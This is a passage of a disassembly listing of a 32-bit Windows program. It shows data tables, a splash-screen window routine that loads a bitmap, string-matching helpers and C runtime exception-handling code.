word_4C92DE dw 0 ; DATA XREF: sub_41EBF2+54�r
; sub_41EE50+DB�r ...
word_4C92E0 dw 0 ; DATA XREF: sub_41EE50+CA�r
word_4C92E2 dw 0 ; DATA XREF: sub_41EE50+D3�r
; sub_41EE50:loc_41EF42�r
word_4C92E4 dw 0 ; DATA XREF: sub_41EE50+C0�r
word_4C92E6 dw 0 ; DATA XREF: sub_41EE50+B8�r
word_4C92E8 dw 0 ; DATA XREF: sub_41EE50+B0�r
word_4C92EA dw 0 ; DATA XREF: sub_41EE50+9E�r
dword_4C92EC dd 0 ; DATA XREF: sub_41EBF2+4B�r
dword_4C92F0 dd 10h dup(0) ; DATA XREF: sub_41EBF2+FB�o
word_4C9330 dw 0 ; DATA XREF: sub_41EE50+46�r
word_4C9332 dw 0 ; DATA XREF: sub_41EBF2:loc_41EC69�r
; sub_41EE50+78�r ...
word_4C9334 dw 0 ; DATA XREF: sub_41EE50+67�r
word_4C9336 dw 0 ; DATA XREF: sub_41EE50+70�r
; sub_41EE50:loc_41EED4�r
word_4C9338 dw 0 ; DATA XREF: sub_41EE50+5D�r
word_4C933A dw 0 ; DATA XREF: sub_41EE50+55�r
word_4C933C dw 0 ; DATA XREF: sub_41EE50+4D�r
word_4C933E dw 0 ; DATA XREF: sub_41EE50+3E�r
dword_4C9340 dd 0 ; DATA XREF: sub_41EBF2+80�r
dword_4C9344 dd 0 ; DATA XREF: sub_41EBF2+132�r
; sub_41EBF2:loc_41ED3E�r ...
dword_4C9348 dd 0 ; DATA XREF: sub_41EBDD�r sub_41EBDD+E�w
dword_4C934C dd 0 ; DATA XREF: sub_41F17E+3�r
; sub_41F17E+2E�w ...
dword_4C9350 dd 0 ; DATA XREF: sub_41F17E+43�w
; sub_41F17E:loc_41F1CD�r
dword_4C9354 dd 0 ; DATA XREF: sub_41F17E+4A�w
; sub_41F17E+60�r
dword_4C9358 dd 0 ; DATA XREF: sub_41DFE6+3F�r
dword_4C935C dd 0 ; DATA XREF: sub_41FD5B:loc_41FDC2�r
; sub_41FD5B+6D�o
dword_4C9360 dd 0 ; DATA XREF: sub_41FD5B:loc_41FD99�r
; sub_41FD5B+44�o
dword_4C9364 dd 0 ; DATA XREF: sub_41FD5B:loc_41FD8C�r
; sub_41FD5B+37�o
dword_4C9368 dd 0 ; DATA XREF: sub_41FD5B:loc_41FDA6�r
; sub_41FD5B+51�o
align 10h
dword_4C9370 dd 0 ; DATA XREF: sub_420309+28�r
; sub_420309+48�w ...
dword_4C9374 dd 0 ; DATA XREF: sub_420D92+28�r
; sub_420D92+4C�w ...
dword_4C9378 dd 0 ; DATA XREF: sub_42101D+26�r
; sub_42101D:loc_421087�w
byte_4C937C db 1 ; DATA XREF: sub_4039F9�r sub_4039F9+9�w
align 10h
dword_4C9380 dd 0A71110h ; DATA XREF: sub_418955:loc_418966�r
; sub_418BFC+14�r ...
dd 7 dup(0)
dword_4C93A0 dd 400h dup(0) ; DATA XREF: _2:off_431A78�o
; _2:00431A80�o
dword_4CA3A0 dd 200h ; DATA XREF: sub_418955+9�r
; sub_418955+56�r ...
dd 7 dup(0)
dword_4CA3C0 dd 0A70650h ; DATA XREF: sub_417E43+B1�r
; sub_41C368+75�r ...
dword_4CA3C4 dd 3Fh dup(0) ; DATA XREF: sub_41D6DF+92�o
dword_4CA4C0 dd 20h ; DATA XREF: sub_4187D7+8�r
; sub_41C441+C�r ...
dword_4CA4C4 dd 4E4h ; DATA XREF: sub_41CA4D+14�r
; sub_41CA4D+65�w ...
align 10h
dword_4CA4D0 dd 3 dup(0) ; DATA XREF: sub_41CA4D+123�o
; sub_41CA4D+171�o ...
dword_4CA4DC dd 0 ; DATA XREF: sub_41CA4D+108�w
; sub_41CA4D+15D�w ...
byte_4CA4E0 db 0 ; DATA XREF: sub_41CC8C:loc_41CD98�w
; sub_41CC8C:loc_41CDB5�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4CA5E0 db 0 ; DATA XREF: sub_41CA4D+5C�o
; sub_41CA4D+AF�o ...
byte_4CA5E1 db 0 ; DATA XREF: sub_4173D8+5D�r
; sub_41CA4D+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4CA6E4 dd 0 ; DATA XREF: sub_41CA4D+6E�w
; sub_41CA4D+12B�w ...
dword_4CA6E8 dd 0 ; DATA XREF: sub_418E61+3C�w
; sub_419506+5�r ...
dword_4CA6EC dd 0 ; DATA XREF: sub_418ED4+23A�r
; sub_418ED4+25A�r ...
dword_4CA6F0 dd 0 ; DATA XREF: sub_418E61+31�w
; sub_418ED4+311�w ...
dword_4CA6F4 dd 0 ; DATA XREF: sub_418E61+21�w
; sub_418ED4+22D�r ...
dword_4CA6F8 dd 0 ; DATA XREF: sub_418E61+28�w
; sub_418EA9�r ...
dword_4CA6FC dd 0 ; DATA XREF: sub_418E61+15�w
; sub_418EA9+8�r ...
dword_4CA700 dd 0 ; DATA XREF: sub_415D6D+F�r
; sub_41756F+5C�r ...
dword_4CA704 dd 0A70000h ; DATA XREF: sub_415D6D+66�r
; sub_415DE1+5A�r ...
dword_4CA708 dd 1 ; DATA XREF: sub_415D6D�r sub_415DE1+C�r ...
dword_4CA70C dd 142340h ; DATA XREF: _0:00417D7E�w
; sub_41D24F+F�r ...
dword_4CA710 dd 1 ; DATA XREF: sub_41D2A7+AD�w
; sub_41FECD�r
dword_4CA714 dd 1 ; DATA XREF: sub_41CE11�r
; sub_41CE11+11�w ...
dword_4CA718 dd 0A7075Ch ; DATA XREF: sub_4167B3+13�r
; sub_4167B3:loc_4167F5�r ...
dword_4CA71C dd 0A70758h ; DATA XREF: sub_4167B3+1�r
; sub_4167B3+C�r ...
_2 ends
; Section 4. (virtual address 000CB000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 000CB000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_3 segment para public 'CODE' use32
assume cs:_3
;org 4CB000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h
_3 ends
; Section 5. (virtual address 000CC000)
; Virtual size : 00011ABF ( 72383.)
; Section size in file : 00011ABF ( 72383.)
; Offset to raw data for section: 000CC000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_4 segment para public 'CODE' use32
assume cs:_4
;org 4CC000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC000 proc near ; CODE XREF: sub_4CF63E+84�p
; sub_4CF94C+333�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE2E0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_1C], esi
lea eax, [esi+10h]
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, esi
call sub_4DB98E
or [ebp+var_4], 0FFFFFFFFh
call sub_4CC060
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4CC000 endp
; =============== S U B R O U T I N E =======================================
sub_4CC05D proc near ; DATA XREF: _5:004DE2E8�o
mov esi, [ebp-1Ch]
sub_4CC05D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4CC060 proc near ; CODE XREF: sub_4CC000+47�p
add esi, 10h
push esi
call ds:dword_4DE018 ; RtlLeaveCriticalSection
retn
sub_4CC060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC06B proc near ; CODE XREF: sub_4CF166+9B�p
; sub_4CF166+C4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
push edi
test edx, edx
jz short loc_4CC07D
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_4CC081
loc_4CC07D: ; CODE XREF: sub_4CC06B+9�j
xor eax, eax
jmp short loc_4CC0D3
; ---------------------------------------------------------------------------
loc_4CC081: ; CODE XREF: sub_4CC06B+10�j
cmp byte ptr [edx], 0
jnz short loc_4CC08F
xor eax, eax
cmp [edi], al
setz al
jmp short loc_4CC0D3
; ---------------------------------------------------------------------------
loc_4CC08F: ; CODE XREF: sub_4CC06B+19�j
push ebx
push esi
mov esi, offset dword_4E0BE4
mov eax, edi
loc_4CC098: ; CODE XREF: sub_4CC06B+49�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_4CC0BA
test cl, cl
jz short loc_4CC0B6
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_4CC0BA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_4CC098
loc_4CC0B6: ; CODE XREF: sub_4CC06B+37�j
xor eax, eax
jmp short loc_4CC0BF
; ---------------------------------------------------------------------------
loc_4CC0BA: ; CODE XREF: sub_4CC06B+33�j
; sub_4CC06B+41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4CC0BF: ; CODE XREF: sub_4CC06B+4D�j
pop esi
pop ebx
test eax, eax
jnz short loc_4CC0CA
mov edi, offset dword_4E0BE0
loc_4CC0CA: ; CODE XREF: sub_4CC06B+58�j
push edx
push edi
call sub_4CC0D6
pop ecx
pop ecx
loc_4CC0D3: ; CODE XREF: sub_4CC06B+14�j
; sub_4CC06B+22�j
pop edi
pop ebp
retn
sub_4CC06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC0D6 proc near ; CODE XREF: sub_4CC06B+61�p
; sub_4CC0D6+70�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov al, [ebx]
push edi
test al, al
jz short loc_4CC120
loc_4CC0E8: ; CODE XREF: sub_4CC0D6+48�j
movsx edi, byte ptr [esi]
movsx eax, al
inc ebx
cmp eax, 2Ah
jz short loc_4CC130
cmp eax, 3Fh
jz short loc_4CC115
push eax
call sub_4CC86E
mov edx, eax
push edi
mov [ebp+arg_4], edx
call sub_4CC86E
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_4CC12C
jmp short loc_4CC119
; ---------------------------------------------------------------------------
loc_4CC115: ; CODE XREF: sub_4CC0D6+21�j
test edi, edi
jz short loc_4CC12C
loc_4CC119: ; CODE XREF: sub_4CC0D6+3D�j
mov al, [ebx]
inc esi
test al, al
jnz short loc_4CC0E8
loc_4CC120: ; CODE XREF: sub_4CC0D6+10�j
xor eax, eax
cmp [esi], al
setz al
loc_4CC127: ; CODE XREF: sub_4CC0D6+58�j
; sub_4CC0D6+86�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4CC12C: ; CODE XREF: sub_4CC0D6+3B�j
; sub_4CC0D6+41�j ...
xor eax, eax
jmp short loc_4CC127
; ---------------------------------------------------------------------------
loc_4CC130: ; CODE XREF: sub_4CC0D6+1C�j
xor edi, edi
cmp byte ptr [esi], 0
jz short loc_4CC142
loc_4CC137: ; CODE XREF: sub_4CC0D6+66�j
inc edi
cmp byte ptr [edi+esi], 0
jnz short loc_4CC137
test edi, edi
jl short loc_4CC12C
loc_4CC142: ; CODE XREF: sub_4CC0D6+5F�j
add esi, edi
loc_4CC144: ; CODE XREF: sub_4CC0D6+7F�j
push esi
push ebx
call sub_4CC0D6
pop ecx
test eax, eax
pop ecx
jnz short loc_4CC159
dec edi
dec esi
test edi, edi
jge short loc_4CC144
jmp short loc_4CC12C
; ---------------------------------------------------------------------------
loc_4CC159: ; CODE XREF: sub_4CC0D6+79�j
push 1
pop eax
jmp short loc_4CC127
sub_4CC0D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC15E proc near ; DATA XREF: sub_4CC271+36�o
var_60 = dword ptr -60h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
push edi
cmp [ebp+arg_4], 0Fh
jnz loc_4CC1FF
and [ebp+var_20], 0
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_20]
push eax
push 18h
push ds:dword_4E5A50
call ds:dword_4E17F8 ; GetObjectA
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4E17F0 ; BeginPaint
push [ebp+var_60]
call ds:dword_4E17E0 ; CreateCompatibleDC
mov [ebp+var_8], eax
push ds:dword_4E5A50
push [ebp+var_8]
call ds:dword_4E17FC ; SelectObject
mov [ebp+var_4], eax
push 0CC0020h
push 0
push 0
push [ebp+var_8]
push [ebp+var_18]
push [ebp+var_1C]
push 0
push 0
push [ebp+var_60]
call ds:dword_4E1804 ; BitBlt
push [ebp+var_4]
push [ebp+var_8]
call ds:dword_4E17FC ; SelectObject
push [ebp+var_8]
call ds:dword_4E17E8 ; DeleteDC
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4E17F4 ; EndPaint
xor eax, eax
jmp short loc_4CC211
; ---------------------------------------------------------------------------
loc_4CC1FF: ; CODE XREF: sub_4CC15E+B�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE050 ; DefWindowProcA
loc_4CC211: ; CODE XREF: sub_4CC15E+9F�j
pop edi
leave
retn 10h
sub_4CC15E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC216 proc near ; DATA XREF: sub_4CC271+152�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_4E1808 ; GetWindowThreadProcessId
call ds:dword_4E16E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_4CC26A
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4E5A54
jz short loc_4CC26A
push ds:dword_4E5A54
call ds:dword_4E182C ; DestroyWindow
and ds:dword_4E5A54, 0
push [ebp+arg_0]
call ds:dword_4E180C ; SetActiveWindow
push [ebp+arg_0]
call ds:dword_4E1810 ; SetForegroundWindow
xor eax, eax
jmp short locret_4CC26D
; ---------------------------------------------------------------------------
loc_4CC26A: ; CODE XREF: sub_4CC216+1E�j
; sub_4CC216+29�j
push 1
pop eax
locret_4CC26D: ; CODE XREF: sub_4CC216+52�j
leave
retn 8
sub_4CC216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC271 proc near ; DATA XREF: sub_4CC3F3+3C�o
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 58h
push edi
mov eax, [ebp+arg_0]
mov ds:dword_4E5A50, eax
and [ebp+var_38], 0
xor eax, eax
lea edi, [ebp+var_34]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_38]
push eax
push 18h
push [ebp+arg_0]
call ds:dword_4E17F8 ; GetObjectA
mov ds:dword_4E5A60, 30h
mov ds:dword_4E5A68, offset sub_4CC15E
mov ds:dword_4E5A88, offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4E1718 ; GetModuleHandleA
mov ds:dword_4E5A74, eax
push offset dword_4E5A60
call ds:dword_4E1814 ; RegisterClassExA
push 10h
call ds:dword_4E1818 ; GetSystemMetrics
mov [ebp+var_20], eax
push 11h
call ds:dword_4E1818 ; GetSystemMetrics
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_34]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_30]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+var_14]
add eax, [ebp+var_34]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_30]
mov [ebp+var_8], eax
mov [ebp+var_58], 98800000h
push 0
push 0
push [ebp+var_58]
lea eax, [ebp+var_14]
push eax
call ds:dword_4DE054 ; AdjustWindowRectEx
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
sub eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_14]
push eax
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_58]
push offset dword_4E1918
push offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4E181C ; CreateWindowExA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4E5A54, eax
loc_4CC36B: ; CODE XREF: sub_4CC271+133�j
push 0
push 0
push [ebp+var_4]
lea eax, [ebp+var_54]
push eax
call ds:dword_4E1820 ; GetMessageA
test eax, eax
jz short loc_4CC3A6
mov eax, [ebp+var_54]
cmp eax, [ebp+var_4]
jnz short loc_4CC390
cmp [ebp+var_50], 0
jnz short loc_4CC390
jmp short loc_4CC3A6
; ---------------------------------------------------------------------------
loc_4CC390: ; CODE XREF: sub_4CC271+115�j
; sub_4CC271+11B�j
lea eax, [ebp+var_54]
push eax
call ds:dword_4E1824 ; TranslateMessage
lea eax, [ebp+var_54]
push eax
call ds:dword_4E1828 ; DispatchMessageA
jmp short loc_4CC36B
; ---------------------------------------------------------------------------
loc_4CC3A6: ; CODE XREF: sub_4CC271+10D�j
; sub_4CC271+11D�j
push 64h
call ds:dword_4E1794 ; Sleep
and [ebp+var_1C], 0
jmp short loc_4CC3BB
; ---------------------------------------------------------------------------
loc_4CC3B4: ; CODE XREF: sub_4CC271+170�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4CC3BB: ; CODE XREF: sub_4CC271+141�j
cmp [ebp+var_1C], 64h
jge short loc_4CC3E3
push 0
push offset sub_4CC216
call ds:dword_4E1830 ; EnumWindows
cmp ds:dword_4E5A54, 0
jnz short loc_4CC3D9
jmp short loc_4CC3E3
; ---------------------------------------------------------------------------
loc_4CC3D9: ; CODE XREF: sub_4CC271+164�j
push 64h
call ds:dword_4E1794 ; Sleep
jmp short loc_4CC3B4
; ---------------------------------------------------------------------------
loc_4CC3E3: ; CODE XREF: sub_4CC271+14E�j
; sub_4CC271+166�j
push [ebp+arg_0]
call ds:dword_4E1800 ; DeleteObject
xor eax, eax
pop edi
leave
retn 4
sub_4CC271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC3F3 proc near ; CODE XREF: sub_4D4DC0+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 3
push 80000000h
push offset a_splashscreen_ ; "_splashscreen.bmp"
call sub_4D0346
test eax, eax
jz short locret_4CC450
push [ebp+var_4]
call sub_4D5456
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4CC446
push offset dword_4E5A58
push 0
push [ebp+var_8]
push offset sub_4CC271
push 0
push 0
call ds:dword_4E183C ; CreateThread
push 64h
call ds:dword_4E1794 ; Sleep
loc_4CC446: ; CODE XREF: sub_4CC3F3+30�j
push 0
push [ebp+var_4]
call sub_4D0741
locret_4CC450: ; CODE XREF: sub_4CC3F3+1E�j
leave
retn
sub_4CC3F3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC454 proc near ; CODE XREF: sub_4CC54C+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4CC46C
push [ebp+arg_0]
call sub_4CCF68 ; RtlUnwind
loc_4CC46C: ; DATA XREF: sub_4CC454+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4CC454 endp
; =============== S U B R O U T I N E =======================================
sub_4CC474 proc near ; DATA XREF: sub_4CC496+A�o
; _4:004CC507�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4CC495
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4CC495: ; CODE XREF: sub_4CC474+10�j
retn
sub_4CC474 endp
; =============== S U B R O U T I N E =======================================
sub_4CC496 proc near ; CODE XREF: sub_4CC54C+67�p
; sub_4CC54C+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4CC474
push large dword ptr fs:0
mov large fs:0, esp
loc_4CC4B3: ; CODE XREF: sub_4CC496:loc_4CC4EE�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4CC4F0
cmp esi, [esp+1Ch+arg_4]
jz short loc_4CC4F0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4CC4EE
push 101h
mov eax, [ebx+esi*4+8]
call sub_4CC52A
call dword ptr [ebx+esi*4+8]
loc_4CC4EE: ; CODE XREF: sub_4CC496+44�j
jmp short loc_4CC4B3
; ---------------------------------------------------------------------------
loc_4CC4F0: ; CODE XREF: sub_4CC496+2A�j
; sub_4CC496+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4CC496 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4CC474
jnz short locret_4CC520
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4CC520
mov eax, 1
locret_4CC520: ; CODE XREF: _4:004CC50E�j _4:004CC519�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_4E1434
jmp short loc_4CC534
; =============== S U B R O U T I N E =======================================
sub_4CC52A proc near ; CODE XREF: sub_4CC496+4F�p
; sub_4CC54C+78�p
push ebx
push ecx
mov ebx, offset dword_4E1434
mov ecx, [ebp+8]
loc_4CC534: ; CODE XREF: _4:004CC528�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4CC52A endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC54C proc near ; DATA XREF: sub_4CC000+A�o
; sub_4CCA80+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_4CC5EC
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4CC57F: ; CODE XREF: sub_4CC54C+90�j
cmp esi, 0FFFFFFFFh
jz short loc_4CC5E5
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4CC5D3
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4CC5D3
js short loc_4CC5DE
mov edi, [ebx+8]
push ebx
call sub_4CC454
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4CC496
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4CC52A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4CC5D3: ; CODE XREF: sub_4CC54C+40�j
; sub_4CC54C+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4CC57F
; ---------------------------------------------------------------------------
loc_4CC5DE: ; CODE XREF: sub_4CC54C+54�j
mov eax, 0
jmp short loc_4CC601
; ---------------------------------------------------------------------------
loc_4CC5E5: ; CODE XREF: sub_4CC54C+36�j
mov eax, 1
jmp short loc_4CC601
; ---------------------------------------------------------------------------
loc_4CC5EC: ; CODE XREF: sub_4CC54C+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4CC496
add esp, 8
pop ebp
mov eax, 1
loc_4CC601: ; CODE XREF: sub_4CC54C+97�j
; sub_4CC54C+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4CC54C endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4CC496
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4CC640
loc_4CC630: ; CODE XREF: sub_4CC640+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4CC640
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4CC640 proc near ; CODE XREF: sub_4CF166+2A�p
; sub_4D8A16+AF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004CC630 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4CC66B
loc_4CC658: ; CODE XREF: sub_4CC640+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4CC630
test cl, cl
jz short loc_4CC6B4
test edx, 3
jnz short loc_4CC658
loc_4CC66B: ; CODE XREF: sub_4CC640+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4CC676: ; CODE XREF: sub_4CC640+61�j
; sub_4CC640+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4CC6B8
and eax, 81010100h
jz short loc_4CC676
and eax, 1010100h
jnz short loc_4CC6B2
and esi, 80000000h
jnz short loc_4CC676
loc_4CC6B2: ; CODE XREF: sub_4CC640+68�j
; sub_4CC640+81�j ...
pop esi
pop edi
loc_4CC6B4: ; CODE XREF: sub_4CC640+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4CC6B8: ; CODE XREF: sub_4CC640+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4CC6F5
test al, al
jz short loc_4CC6B2
cmp ah, bl
jz short loc_4CC6EE
test ah, ah
jz short loc_4CC6B2
shr eax, 10h
cmp al, bl
jz short loc_4CC6E7
test al, al
jz short loc_4CC6B2
cmp ah, bl
jz short loc_4CC6E0
test ah, ah
jz short loc_4CC6B2
jmp short loc_4CC676
